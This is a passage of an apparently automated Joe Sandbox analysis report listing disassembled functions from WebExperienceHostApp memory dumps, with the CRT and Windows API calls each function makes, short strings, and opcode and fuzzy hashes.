_wfsopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFE007AAAD1
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFE007AAADF
_wfsopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFE007AAB10
fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFE007AAB2B

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: _wfsopen$fclosefseek
String ID:
API String ID: 1261181034-0
Opcode ID: 4b2da362127e04f405fab03e2eb1a3b31cc41c713e6c08ffbf6b669a431fb480
Instruction ID: 8f7897d089017b0206ac642738ac22ff05f1efe3a85dce68728fa7c853ce0e2e
Opcode Fuzzy Hash: 4b2da362127e04f405fab03e2eb1a3b31cc41c713e6c08ffbf6b669a431fb480
Instruction Fuzzy Hash: 2E21A021B1AA0651EB69AB06A55473666D2BFC5B84F0C8138DF4E43BA8DF3CE805C300

Function 00007FFE007DB060 Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,?,?,00000000,00007FFE007D612B), ref: 00007FFE007DB094
___lc_collate_cp_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,?,?,00000000,00007FFE007D612B), ref: 00007FFE007DB09E

Part of subcall function 00007FFE007A2740: __strncnt.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007A2786
Part of subcall function 00007FFE007A2740: __strncnt.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFE007A27AB
Part of subcall function 00007FFE007A2740: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FFE007A27EB

memcmp.VCRUNTIME140_APP(?,?,?,?,?,?,00000000,00007FFE007D612B), ref: 00007FFE007DB0C1
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,00007FFE007D612B), ref: 00007FFE007DB0FF

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: __strncnt$Info___lc_collate_cp_func___lc_locale_name_func_errnomemcmp
String ID:
API String ID: 3421985146-0
Opcode ID: 9a4f074f7fe3bee5cb6c30750c332483e251a416c8866ebaadee7a14ac30e426
Instruction ID: a5a00008150c3d159c954c19ac0b39871aa156bfad24ebb7c5ed2f96158a0c66
Opcode Fuzzy Hash: 9a4f074f7fe3bee5cb6c30750c332483e251a416c8866ebaadee7a14ac30e426
Instruction Fuzzy Hash: 09216231A09B85C6EB109F1AD44002DB6A4FBC8FD4F594136DB9D57BA9CF3DE4418700

Function 00007FFE007D9070 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE007B28BC: FormatMessageA.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FFE007B28E2

memcpy.VCRUNTIME140_APP ref: 00007FFE007D90D9

Part of subcall function 00007FFE007A3474: memcpy.VCRUNTIME140_APP(?,?,?,00007FFE007A6B5F,?,?,?,00007FFE007A47EC), ref: 00007FFE007A3516

memcpy.VCRUNTIME140_APP ref: 00007FFE007D9115
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FFE007D913B

Strings

unknown error, xrefs: 00007FFE007D90CF

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: memcpy$FormatFreeLocalMessage
String ID: unknown error
API String ID: 1603595190-3078798498
Opcode ID: 393403b6a1f1d4d4069c48657dc765f8cbe8dc40f65fc9da209a8faca06826de
Instruction ID: af7e17f4ae9ea533e99691f8a7c0a749e00490b008fa34a0c3522b47b79d7b17
Opcode Fuzzy Hash: 393403b6a1f1d4d4069c48657dc765f8cbe8dc40f65fc9da209a8faca06826de
Instruction Fuzzy Hash: 9B214622A09B9586EB14AF26E50522D7BA1EB45FC8F0C4135DB8D077AECF3DE551C780

Function 00007FFE007A5020 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 49COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007A5088
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007A509F

Strings

@Rz, xrefs: 00007FFE007A50A5
Pz, xrefs: 00007FFE007A5073

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: free
String ID: Pz$@Rz
API String ID: 1294909896-2326397990
Opcode ID: a677518fa27c5f8d48adccc261005f7c3989c304e9b3d318f7d62f1f7a3e4e0d
Instruction ID: dacd3d7e8ef4e3ca794c4148214d111166665c690b5041ec8c5f99f4501605d5
Opcode Fuzzy Hash: a677518fa27c5f8d48adccc261005f7c3989c304e9b3d318f7d62f1f7a3e4e0d
Instruction Fuzzy Hash: A4115E31A0AE0781EB14AB29E45127A2360EF85BC8F584031EB4D5777EDF7DE896C380

Function 00007FFE007DBAE0 Relevance: 6.0, APIs: 4, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

APIs

___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB00
___mb_cur_max_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB08
___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB11
__pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,00007FFE007A6043), ref: 00007FFE007DBB2D

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: ___lc_codepage_func___lc_locale_name_func___mb_cur_max_func__pctype_func
String ID:
API String ID: 3203701943-0
Opcode ID: e28adfae1c249bda0afd0f7cf76bd22d5b083521ec3e54fdc1464557419da4a5
Instruction ID: 8b7c2855d1b09fc05e5f7f3f00e9d140fb96148e449e51492e121cb70dcff18a
Opcode Fuzzy Hash: e28adfae1c249bda0afd0f7cf76bd22d5b083521ec3e54fdc1464557419da4a5
Instruction Fuzzy Hash: 2701C8A2E16B9186DB059F79D840078B7A0FB58F84B199236DB4E87728DF7CD0C28710

Function 00007FFE007A50E0 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007A5147
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007A5151

Strings

@Rz, xrefs: 00007FFE007A5157
Pz, xrefs: 00007FFE007A5133

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: free
String ID: @Rz$Pz
API String ID: 1294909896-3552939424
Opcode ID: 4c118b032e9c73e1c793e6eb58cc2b2f397da3bff51285a3375a41a53c5952be
Instruction ID: fe6f7231927e0a33b9fe64438f6465a322786031d9687573db8298b5d82c0814
Opcode Fuzzy Hash: 4c118b032e9c73e1c793e6eb58cc2b2f397da3bff51285a3375a41a53c5952be
Instruction Fuzzy Hash: A9116A71A0AE4A81EB14AB09E4513782361EF85BC8F584031EB0D1777DDF7CE896C700

Function 00007FFE007A24C8 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007A2530

Strings

RCC, xrefs: 00007FFE007A24F2
csm, xrefs: 00007FFE007A24FA
MOC, xrefs: 00007FFE007A24EA

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: malloc
String ID: MOC$RCC$csm
API String ID: 2803490479-2671469338
Opcode ID: 99de963a1fe55b9bd7a0891b46763f532adfc88203a95788734ee6b425dadccb
Instruction ID: 4c1ec36c35a69bca0ec705be5afedfea0c6ff8debe43286a73bdc7f0a695421d
Opcode Fuzzy Hash: 99de963a1fe55b9bd7a0891b46763f532adfc88203a95788734ee6b425dadccb
Instruction Fuzzy Hash: 41018861E0A10186EB657F19915417963A2BF9AB84F2C9071EB0D477BECE3CE4528702

Function 00007FFE007AA4E0 Relevance: 6.0, APIs: 4, Instructions: 37fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE007A9CD0: CreateFile2.API-MS-WIN-CORE-FILE-L1-2-0 ref: 00007FFE007A9D00

SetFilePointerEx.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFE007AA514
SetEndOfFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FFE007AA523
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FFE007AA536
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FFE007AA541

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: File$CloseCreateErrorFile2HandleLastPointer
String ID:
API String ID: 3074824862-0
Opcode ID: 0cd72fde80447eeb56bad4721d4aaa63301966e39746875d89a672b024a734dd
Instruction ID: fc0ef2dda995bd4d0380dc1e9a8b08fe8210f36e0703667823138fa2923c8019
Opcode Fuzzy Hash: 0cd72fde80447eeb56bad4721d4aaa63301966e39746875d89a672b024a734dd
Instruction Fuzzy Hash: AAF0D611F19A5253FB546765B41563A1290AF89BF0B8C5230EF2D43BE8CF2CD4518704

Function 00007FFE007B9600 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B961D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B9627
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B9631

Strings

@Rz, xrefs: 00007FFE007B9637

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: free
String ID: @Rz
API String ID: 1294909896-3079074598
Opcode ID: e01fa5ed53f3a4895c7591c5bea2c7d990d774a0cdecb02d5ec00bf01ea059c4
Instruction ID: 03c394db2e102a12c1f589c97816c900b001d09a924a6d19d728fd6797cd0368
Opcode Fuzzy Hash: e01fa5ed53f3a4895c7591c5bea2c7d990d774a0cdecb02d5ec00bf01ea059c4
Instruction Fuzzy Hash: 70F01D2161AF0692DB04AB19E5902786334EF88BD4F584031DB4D03B78DE6CE4A5C300

Function 00007FFE007B9670 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B968D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B9697
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B96A1

Strings

@Rz, xrefs: 00007FFE007B96A7

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: free
String ID: @Rz
API String ID: 1294909896-3079074598
Opcode ID: 13d6b93d7afaa9b0249f323a7612b5993f3595e5392c3a1c33a23faceb5c3cc5
Instruction ID: 9e07836695a54fdbc3bef0c62ecf448cb0427dfd43f27729fd5ee36483dada82
Opcode Fuzzy Hash: 13d6b93d7afaa9b0249f323a7612b5993f3595e5392c3a1c33a23faceb5c3cc5
Instruction Fuzzy Hash: DEF01D2161AF0682DB04AB19E5902786374EF88BD4F584031DB4D03B78DE7CE4A58300

Function 00007FFE007ABE90 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007ABEAD
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007ABEB7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007ABEC1

Strings

@Rz, xrefs: 00007FFE007ABEC7

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: free
String ID: @Rz
API String ID: 1294909896-3079074598
Opcode ID: 311ffdb8faa09e0ead53af376f3f16983548877c287860f2116317904bcf37df
Instruction ID: 5b27658fd12e6722196d23c28b1bdc7f9a19e7097556506520f877e138733d31
Opcode Fuzzy Hash: 311ffdb8faa09e0ead53af376f3f16983548877c287860f2116317904bcf37df
Instruction Fuzzy Hash: 8AF0F92161AB0692DA04AB19E5902786334EB88BD4F584031DB4D03B79DE7CE4A58300

Function 00007FFE007A4AA0 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007A4ABE
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007A4AD5

Strings

@Rz, xrefs: 00007FFE007A4ADB
Pz, xrefs: 00007FFE007A4AA6

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: free
String ID: Pz$@Rz
API String ID: 1294909896-2326397990
Opcode ID: b21111f2f01a996cdf5c1c75ad8b64239b79ef686f16861f688bd8f43cb3f9e7
Instruction ID: 3b3dcdd04fde8150a9f8a0c990de73498f14790e196979bc52f569e607dea16a
Opcode Fuzzy Hash: b21111f2f01a996cdf5c1c75ad8b64239b79ef686f16861f688bd8f43cb3f9e7
Instruction Fuzzy Hash: E5F03031A4BA0685EB14AB29D8501382374EF88F48B684030DB0D87378DE7DE8A7C300

Function 00007FFE007B92C0 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B92D7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B92E1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B92EB

Strings

@Rz, xrefs: 00007FFE007B92F1

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: free
String ID: @Rz
API String ID: 1294909896-3079074598
Opcode ID: b65dafd4f0345cf50e236d3ffe1f136317cca043b08921e7c385bcf79bcd8037
Instruction ID: 65f699818dfbdaa212a3a8eaddc51773ab008df28b2199e0963f83eac02f5da6
Opcode Fuzzy Hash: b65dafd4f0345cf50e236d3ffe1f136317cca043b08921e7c385bcf79bcd8037
Instruction Fuzzy Hash: 7EE09A75A16F06C1DB04AF65E8540786374FB88F99B690031CB5D56338DE6CE4AAC300

Function 00007FFE007A4AF0 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 16COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007A4B0D
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007A4B17

Strings

@Rz, xrefs: 00007FFE007A4B1D
Pz, xrefs: 00007FFE007A4AFA

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: free
String ID: @Rz$Pz
API String ID: 1294909896-3552939424
Opcode ID: ba7d5fcdeca7e42e582ac1da278be79fdbf2a1abd4628488c3ce9e7dfbec58c5
Instruction ID: 29079ed4949ebc352ddd996a6a788a0d394858f56c86e621a6d5dbb6633e6b4b
Opcode Fuzzy Hash: ba7d5fcdeca7e42e582ac1da278be79fdbf2a1abd4628488c3ce9e7dfbec58c5
Instruction Fuzzy Hash: 11E01A75A0AA0681EB14AB25D8502383374EF48B99F680031CB0C06378DF7CE4AAC340

Function 00007FFE007B9270 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B9287
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B9291
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007B929B

Strings

@Rz, xrefs: 00007FFE007B92A1

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: free
String ID: @Rz
API String ID: 1294909896-3079074598
Opcode ID: 96c44796cacde1bdba4a0612f47b390691b0c5c621480ea22f4fd18a6abbd32f
Instruction ID: 1f72e7ff44354a723bd9d585540d5b20f238a6060f871d7fabe87e970962a6a7
Opcode Fuzzy Hash: 96c44796cacde1bdba4a0612f47b390691b0c5c621480ea22f4fd18a6abbd32f
Instruction Fuzzy Hash: 77E09A35A16F06C1DB04AF65E8540787374EF88F99B690031CB4D56338DE6CE4AAC300

Function 00007FFE007D27A0 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007D27B7
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007D27C1
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE007D27CB

Strings

@Rz, xrefs: 00007FFE007D27D1

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: free
String ID: @Rz
API String ID: 1294909896-3079074598
Opcode ID: 7c6157ca397b0088499bd56f385209df40795a8ead6873b2b5f29ead13bee64c
Instruction ID: 3c33b7de1cfa4dacfa36c760928afbd0ced34ddc241b2b7dc6e70eecb845898b
Opcode Fuzzy Hash: 7c6157ca397b0088499bd56f385209df40795a8ead6873b2b5f29ead13bee64c
Instruction Fuzzy Hash: F4E09A75A16F06C1DB04AF65E8540786374FB48F99B690031CB4D57338DE6CE4AAC300

Function 00007FFE007CD4D0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140_APP ref: 00007FFE007CD63C
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007CD729

Strings

0123456789-, xrefs: 00007FFE007CD574

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073907508.00007FFE00827000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe007a0000_WebExperienceHostApp.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturnmemcpy
String ID: 0123456789-
API String ID: 931391446-3850129594
Opcode ID: 7264b870818fb0f69d8a1a77900bcf26002443e7252339213ad7f73e304bd3b5
Instruction ID: 5728b1d7c1956428d661f7087b01e28b06fdb677cc74c5e27457789bdbe175d1
Opcode Fuzzy Hash: 7264b870818fb0f69d8a1a77900bcf26002443e7252339213ad7f73e304bd3b5
Instruction Fuzzy Hash: F9716E62B1AB5599EB10DFA5E4506AC3371EB48B88F484036DF4D27BACDE3CD85AC340

Function 00007FFE007CD240 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 170COMMON

Download Yara Rule

APIs

swprintf_s.PGOCR ref: 00007FFE007CD2DD
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE007CD490

Strings

%.0Lf, xrefs: 00007FFE007CD2CD

Memory Dump Source

Source File: 00000008.00000002.2073828643.00007FFE007A1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFE007A0000, based on PE: true

Associated: 00000008.00000002.2073811683.00007FFE007A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073862557.00007FFE007F5000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000008.00000002.2073888575.00007FFE00823000.00000004.00000001.01000000.00000008.sdmpDownload File
